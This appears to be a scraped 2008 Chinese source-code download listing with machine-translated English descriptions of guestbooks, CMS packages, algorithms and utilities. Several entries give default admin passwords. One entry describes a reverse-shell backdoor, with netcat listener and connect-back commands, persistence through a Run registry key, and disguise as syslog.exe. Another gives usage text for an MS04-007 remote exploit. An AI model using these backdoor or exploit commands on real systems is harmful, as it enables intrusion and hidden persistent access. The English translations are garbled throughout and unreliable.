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7j admin 18j admin admin 23j 后台用户名密码:admin 15j 传全部文件及子目录到服务器,修改conn.asp文件中数据库   路径。 管理登陆:admin.asp (主页上右上角有管理登陆的连接)   网站管理员  密码   请管理员登录后进入“基本配置”栏进行相关设置。 3j 安装使用 欢迎使用我们的留言本,使用之前请仔细阅读版权声明。 首先,将下载的压缩文件解压缩到一个文件夹中,上传到支持ASP的服务器即可运行。 用户第一次使用留言本时,需要先申请成为版主,留言本首页为index.asp?user=用户名。 数据库默认名称为qq538.mdb,为防止恶意下载,建议改名。并在conn.asp中修改相关文件信息。 默认系统管理员帐号:admin 默认系统管理员密码:admin 。 2k admin 123456-7j admin (admin admin / h Miller : / / / bytxl background Username Password : admin - 55 subdirectory and all documents to the server, conn.asp revised document database path. Management Landings : admin.asp (Home on the upper right-hand corner of landing a management link) Webmasters : Password : please login administrators entered the "basic configuration" column for the relevant set. 3j installation welcomed the use of the messages we use to read carefully before copyright statement. First, download the compressed file to a compressed folder, upload support to the ASP server can run. Users first use of the messages that need to first apply to become moderator, voice of the Home index.asp user = user. The default name for t
Update : 2008-10-13 Size : 633668 Publisher : aaa

源代码\\Path.asp 数据库配置文件 源代码\\Const.asp 系统常量文件 源代码\\default.asp 用户登陆主页面 源代码\\AdminLogin.asp 管理员登陆主页面 源代码\\IsAdmin.asp 判断用户身份文件 源代码\\ChkUser.asp 登陆处理页面-source \\ Path.asp database configuration file source code \\ Const.asp system constants documents source \\ default.asp landing Home users face source \\ AdminLogin.a sp administrators landing Home-source \\ IsAdmin.asp judgment user identity document source code \\ Chk User.asp landing processing of the page
Update : 2008-10-13 Size : 840963 Publisher : liu

你能指定对话框的父窗口,它能作为一个模态对话框. 你能指定对话框的标题 dobrowse()函数能切断默认路径的 \\ 字符. 这个类有个虚拟成员能动态的使能或禁用ok按钮.它还能指定状态区显示的文字. -you can designate the parent dialog window it could serve as a Modal Dialog. you can designate the title of the dialog dobrowse () function can be cut off by default Road Drive \\ character. this class has a virtual members dynamic enable or disable ok button. It also shows the designated area of the state language.
Update : 2008-10-13 Size : 16777 Publisher : 董程林

DL : 0
程序用法: 共有12个地图文件,大、中、小各4个 对于小地图,程序默认的种群大小60,最大世代数500,基本上都可以求出全局最优解; 对于中地图,需要使用者调整参数,当种群大小设为120,最大世代数设为2000,基本上都可以求出全局最优解; 对于大地图,参数可以进一步增大,但能否求出全局最优解,本人无法保证 路径的演化在程序界面上可以随时得到反映,便于观察和分析 一次路径求解完毕后,在程序所在的文件夹下,会生成GaLog.txt文件,记录了每个世代基因的演化情况,将复选框“输出染色体”打勾,可以在输出文件中得到每代每个基因的详细序列,但文件大小会急剧增大,一般在分析算法时才选用 主要参考资料: 《遗传算法——理论、应用及软件实现》——西交出版社.王小平等 《遗传算法及其应用》——科学出版社.陈国良等 -procedures usage : a total of 12 maps, large, medium and small for the four small map the default size of the population 60, the largest number of 500 generations, can basically get the global optimum solution; for the map, which requires the user to adjust parameters, when the population size as a 120, the largest number of generations Set in 2000, basically we can solve the global optimum solution; for a map, parameters can be further increased. However, whether sought global optimal solution, I can not guarantee that the path of evolution on the interface procedures can always be reflected, to facilitate observation and analysis of a solution path after the procedure where the folder, GaLog.txt will generate documents, records of each generation evolution of the gene, to check box "
Update : 2008-10-13 Size : 115857 Publisher : 戴朝华

Setting and Changing Column Widths By default, all columns in a table start out with equal width, and the columns automatically fill the entire width of the table. When the table becomes wider or narrower (which might happen when the user resizes the window containing the table), all the column widths change appropriately. -Setting and Changing Column Widths By DEFA ECE, all columns in a table start out with equal width , and the columns automatically fill the entire width of the table. When the table becomes wider or narrower (which might happen when the user re sizes the window containing the table). all the column widths change appropriately.
Update : 2008-10-13 Size : 2788 Publisher : 黄加斌

DL : 0
JSP/JavaBean开发的一套留言本系统 默认的管理员和密码都是admin-JSP / JavaBean development of a set of messages of the system administrator and the default passwords are adm in
Update : 2008-10-13 Size : 372754 Publisher : 杨云志

程序内核采用万博中小企业网站管理系统,并做了一些防攻 击处理.安全方面绝对放心. 默认帐号:speed 默认密码:admin888 -procedures used Huambo core SME website management systems, and has done a number of anti-attack treatment. Rest assured safety. Default Account : speed Default Password : admin888
Update : 2008-10-13 Size : 2737768 Publisher : dongh

DL : 0
本论坛采用asp+access2000开发,因此,要求服务器为WIN2000+IIS5+ADO2.5或以上版本, 方能保证本论坛高效,稳定的运行。如果你的服务器为WINNT 4.0+IIS,则请用文本编辑器(如 记事本)打开forumconn.asp,使用第5行的ODBC驱动,并将第6行变为注释。但这样做将严重影 响本程序的效率,经测试,默认的OLEDB方式在大数据量时效率要比ODBC驱动方式效率高2.5倍 左右。-use this forum asp access2000 development, therefore, ask the server to Windows 2000 IIS5 ADO2.5 or later, this forum can assure efficient, stable operation. If your server WINNT 4.0 IIS, please use a text editor (such as Notepad) to open forumconn.asp. 5 OK to use the ODBC driver, and will become the first six lines of the Notes. But this will seriously affect the efficiency of this procedure, tested, the default mode OLEDB data in large quantities efficient manner than ODBC drivers high efficiency 2.5 times.
Update : 2008-10-13 Size : 2843215 Publisher : yubo

网站的最大特点是强大的后台管理功能,能够对前台的公告栏,友情链接,通知栏, 1 网站配置和使用说明 新闻活动,活动图片,文件下载,职工风采,电话簿进行管理。 网站的最大特色支持更换皮肤功能,并能通过后台管理轻松更换网站的皮肤。默认情况下提供了4钟网站皮肤: 天空蓝,金子黄,罗兰紫,生命绿。同时,网站支持用户添加新皮肤的需求,但是在后台不提供该管理功能,如要添加新皮肤,请直接修改数据库-site is the biggest characteristic of the background of a strong management capabilities, to the right prospects bulletin boards and Links, notice column, a Web site configuration and use information activities, photographs, documents downloaded workers charisma and directory management. Terms of the biggest characteristics to support the replacement of the skin function, and the ability to easily change management background website of the skin. Default under four minutes for the skin site : sky blue, golden yellow, Roland purple, green life. Meanwhile, the website will allow users to add new skin needs, but not in the background to provide the management functions, such as adding new skin, please modify the database
Update : 2008-10-13 Size : 1605608 Publisher : 陈舟锋

我们提供的VideoIM手机自动拍照上传器J2ME版本[开源]就是这么一种概念: 一个可以下载到手机(例如Nokia7610已经确实可以下载安装并正常运行)的Java应用程序,用来自动驱动你的手机摄像头定时拍摄一张图像(默认是Jpeg格式,数据量很小)。然后,后台线程将Jpeg图像(很小,大约几KB)上传到服务器上。手机默默地拍照,默默地上传照片,不用手工干预,比如你可以设置每隔三分钟拍一张照片,然后上传到Flickr这个著名的图片共享站点上,全世界都会看到你的慢速视频。 -VideoIM provided by the automatic camera phone uploads for J2ME version [revenue] is such a the concept of species : one can be downloaded to the phone (for example, Nokia7610 has indeed be able to download and install the normal operation) Ja va applications, automatic drive to your phone camera filming a regular image (the default is Jpeg format, data is insignificant). Then, background threads will Jpeg images (very small, about several KB) uploaded to the server. Camera phone quietly, silently upload pictures without manual intervention For example, you can set every three minutes for a photo shoot. Flickr then uploaded to the famous photo-sharing site, the world will see you slow the video.
Update : 2008-10-13 Size : 741805 Publisher : 郑昀

简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\\winnt\\下名为syslog.exe,并在 HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat - vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address, port 7358. procedures will copy itself to C : \\ winnt \\ named syslog.exe and HKEY_CURRENT_USER \\ \\ Software \\ \\ Microsoft \\ \\ Windows \\ \\ CurrentVe
Update : 2008-10-13 Size : 12283 Publisher : 张军

这是一个在系统缺省工具栏上添加按钮的程序,该程序添加了一个链表的菜单,可以实现输入元素,输出链表,删除元素,淸空链表等功能。-This is one of the system's default toolbar button to add the program, which adds a menu Chain, can achieve input element, the output chain and delete elements, and soft air Chain function.
Update : 2008-10-13 Size : 56848 Publisher : zhangkeju

使用说明:    编译并安装,在 IDE 的控件栏可以看见 VCLSKIN 包含有 TSkinData,TSkinStore和TSkinCaption 请在放置 TSkinData 控件的 FORM 上放置一个 TSkinCaption, 当TSkinCaption 的 Active 属性为 False 时关闭补丁,当 Active 为 True 时开启补丁。 补丁未开启时 VclSkin 为 DEMO 版, 补丁开启时 VclSkin 业已成为 retail 版本。 补丁支持运行时动态开启。 请注意:3.93 以后的版本补丁 active 属性缺省为开启。 新增 SKIN 的透明设置 SkinAlpha,可以制作全透明的 Vista 界面,包括 Menus,Dialogs,MessageBox 等等。 备注:此版本已经可以和 TNT Unicode Controls 很好的一起工作! 如果你需要转载本补丁,请指明出处。 QQ: 378453102 (欢迎交流)-use : compile and install the control of the IDE can see VCLSKIN column contains TSkinData, TSkinStore and TSkinCaption please placed TSkinData FORM controls placed on a TSkinCaption, when TSkinCaption Active attribute to False closed patch, when Active at the opening of the True patch. Patch VclSkin not opened for the DEMO version, patch opened VclSkin has become a retail version. Patches support dynamic runtime opened. Please note : the version 3.93 patch after active attribute default opened. New skin file SkinAlpha set up a transparent, transparent can be produced all the Vista interface, including Menus, Dialogs, MessageBox and so on. Note : This version can and TNT Unicode Controls good work! If you need reproduced the patch, please indicate the source. QQ : 378453102
Update : 2008-10-13 Size : 5430271 Publisher : 李清华

DL : 0
1、实现了一个简单的数据库 2、采用HASH表建立索引 3、可以从database.dat中读取表结构,生成数据库, 4、[FORM]开始的段创建表和读入缺省值 5、[DATA]保存数据库数据 6、支持多索引 7、具体使用可以看示例-achieve a simple two databases using hash table index 3, which can be read from database.dat table structures, database generation, 4, [FORM] the beginning of the creation of tables and read into default values 5, [DATA] preservation Database 6 , supports multi-7 index, the use of specific examples can be seen
Update : 2008-10-13 Size : 43896 Publisher : 王伟

本书作者根据自己学习C++的亲身体会及多年教学经验,用简单的例子和简练的叙述讲解C++编程,别具特色。 全书共分十八章,内容涉及对象的演化、数据抽象、隐藏实现、初始化与清除、函数重载与缺省参数、输入输出流介绍、常量、内联函数、命名控制、引用和拷贝构造函数、运算符重载、动态对象创建、继承和组合、多态和虚函数、模板和包容器类、多重继承、异常处理和运行时类型识别。 本书作为正式教材和自学用书均非常优秀,作为程序设计者的参考用书亦极为合适。-author of this book learning C according to their personal experience and years of teaching experience, simple examples and concise narrative on the C programming, unique. The book is divided into 18 chapters, covering the evolution of object, data abstraction, hiding realized, initialization and removals, function overloading and default parameters, input and output streams, constants, associated functions, naming control, the application and copy constructor function, Operator, dynamic object creation, and the combination of inheritance and polymorphism and virtual functions, templates and pack containers, multiple inheritance, Exception Handling and runtime type identification. The book as an official self-learning materials and books are excellent, as a procedural designers reference b
Update : 2008-10-13 Size : 22494158 Publisher : 吴鸣春

DL : 0
将此3个文件解压到网站管理目录(默认admin)下 admin_index_left.asp 只是在管理界面左侧导航处加上“生成网站地图”链接,如果你没有修改过左侧菜单可以用此文件直接覆盖即可,否则可以自己修改admin_index_left.asp添加生成网站地图链接(链接到map_mark.asp即可) 网站地图的好处大家知道,我也就不多说了,一个小小的插件,时间仓促我的水平有限也希望高手能修改完善!-this document to extract website management directory (default admin) admin_index_left.asp only in the left navigation management interface words "Generation Site Map" link, if you have not changed menu on the left side of this document can be directly coverage, since it can others add amendments admin_index_left.asp Generation Site Map link (link to be map_mark.asp) Site Map of the benefits we all know, but I have nothing to add to that, a small plug-in the limited time I also hope that the level of master limited to amend the perfect!
Update : 2008-10-13 Size : 4059 Publisher : 王安

DL : 0
I. Introduction This code exploits a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. II. Screenshots $ ./ . kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007) by Solar Eclipse <> Usage: kill-bill -p <port> -s <service> host Services: iis IIS HTTP server (port 80) iis-ssl IIS HTTP server with SSL (port 443) exchange Microsoft Exchange SMTP server (port 25) smb-nbt SMB over NetBIOS (port 139) smb SMB (port 445) If a service is running on its default port you don t have to specify both the service and the port. Examples: kill-bill -s iis kill-bill -p 80 kill-bill -p 1234 -s smb -I. Introduction This code exploits a previously undisclosed vulnerability in decoding the bit string code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04 -007 patch. II. Screenshots $. / kill-bill : Microsoft ASN.1 remote exploit for CAN-2003 - 0818 (MS04-007) by Solar Eclipse
Update : 2008-10-13 Size : 13156 Publisher : JANE

算法实现题1-2 平面几何问题 .问题描述: 试用C++ 的类来定义表示简单平面几何对象的抽象数据类型Geometry 。 (1) 用浮点数定义2 个几何量m1 和m2;m2 的缺省值为0.0。 (2) 实现2 个构造函数:允许用1 个参数或2 个参数声明几何对象。用1 个参数r 声明 的几何对象为半径为r 的圆;用2 个参数r1 和r2 声明的几何对象为r1′r2 的矩形。所声明 的几何对象的中心在原点。 (3) 定义计算几何对象的面积,周长和对角线长度的成员函数。 (4) 对于给定的实数r,先声明一个半径为r 的圆c1;然后声明一个c1 的外切矩形s, 接着再声明s 的外接圆c2。 (5) 输出(4) 中几何对象的面积,周长和对角线长度。 .编程任务: 给定实数r,计算几何对象c1,s 和c2 的面积,周长和对角线长度。 .数据输入: 由文件input.txt 给出输入数据。第1 行有1 个实数r,表示圆c1 的半径。 .结果输出: 将计算出的几何对象c1,s 和c2 的面积,周长和对角线长度分别输出到文件output.txt 。 文件的第1 行是计算得到的圆c1 的面积和周长;第2 行是矩形s 的面积,周长和对角线长 度;第3 行是圆c2 的面积和周长。-algorithm that 1-2 plane geometry problem. Problem description : probationary category C to the definition simple plane geometry objects to the abstract data type Geometry. (1) The definition of a float with two geometric m1 and m2; M2, the default value of 0.0. (2) to achieve two Constructors : permits the use of a parameter or two parameters statement geometric objects. Using a parameter r statement geometric objects to a radius of the circle r; With two parameters r1 and r2 statement to the geometric objects r1'r2 rectangular. Statement by the geometric objects in the center of origin. (3) calculate the geometric definition of the target area, perimeter and length of the diagonal members function. (4) For a given set of real r, first declare a radius of the circle r c1; Then a state
Update : 2008-10-13 Size : 66427 Publisher : stzxxxstz

欢迎使用PB小助手。 作为一名PB程序员,您是否有过为了查找某一语句而不辞辛劳地打 开一个又一个事件或函数,在其脚本中苦苦寻觅的痛苦经历;而为了找 到某一变量或函数的定义,您不得不在错综复杂的对象继承关系中刨根 溯源、上下求索。有了PB小助手,这些问题都将迎刃而解。它能帮您在 一大堆对象或脚本中迅速找到您想要的,快人一步,胜人一筹! 主要功能(详情见帮助): * 对象检索。在PB应用中搜索名称中包含指定字符串的对象。 * 脚本检索。在PB应用源码中搜索指定字符串。 * 辅助注释。按自定义模板格式插入代码注释。 * 代码美化。按缺省的缩进格式对代码进行整理美化。 * PB工具栏。自动集成到PB IDE工具栏,操作更方便快捷。 * 浮动窗口。工具条窗口显示,最小化至系统托盘。 * 代码统计。对选定的PBL库进行对象及代码行数统计。 * 代码浏览。PowerScript语法高亮显示。 * 重复对象检索。 * 无用对象检索。 * 对象属性列表。 * 对象继承关系。 本软件使用PowerBuilder开发,使用时需PB运行库支持。如果您有-welcomed the use of PB his assistant. PB as a programmer, you have to find a phrase and the day to open a case or another function, in its struggle to find the script's painful experience; To find a variable or a function definition, you have to target in a complicated succession of relations might be back, The next quest. With PB his assistant, to have these problems would be resolved. It can help you a lot or a script you want to quickly find the Early Bird, better than others! Major functions (for details, see Help) : * Object Search. PB application in the name of containing search string is specified target. * Search script. PB-source applications in search string is specified. * Supplementary Notes. By custom template format insert code Notes. * Code beautification. By default for
Update : 2008-10-13 Size : 968382 Publisher : 陈同坏

日记本(多用户版)V3.0 主要功能: 1、日记本基本功能:添加、修改日记等。 2、日记加密:当日记添加时,若选择“加密”则默认阅读密码为后天设置的阅读密码,可以为每则日记设置一个阅读密码,也可以为每则日记设置不同的阅读密码(打开刚设置加密的日记,选择修改阅读密码)。 3、自己设计日记封面:可修改封面文字,也可选择封面图片。“封面图片”可以随机显示所有图片或者只选择一个固定的图片。(只有“随机显示”选择“否”,则选择的固定图片才生效。) 4、优秀日记列表,最新日记列表,注册用户列表。 5、限制用户注册功能。 6、取回密码功能。 7、超级管理员可在后台可设置优秀日记功能。 8、超级管理员后台管理时,可按时间管理日记,也可按用户管理日记。 9、增加了日记评论功能.用户可自由开启或关闭日记评论功能。 10、增加了日记分类功能.可按日记类型和用户地区分类. 11、增加了日记首页,日记查询,日记本友情链接功能。-diary (the multi-user version) V3.0 main functions : a diary, the basic functions : add, modify, such as blogs. 2, diary encryption : When diary add, if they choose, "encryption" read default passwords set up for the day after reading passwords for each diary set a password to read, they can also set up for each diary read different passwords (encrypted set to open just the diary, to alter the reading passwords). 3, diary cover their design : can modify the cover letter, choose the cover photo. "Cover photo" shows all random pictures, or choose only one fixed the pictures. (Only "random shows that the" choice "no", then choose a fixed Photo take effect.) 4, excellent diary list, the latest diary List, a registered user list. 5, restricting users to r
Update : 2008-10-13 Size : 2613112 Publisher : 张水晶
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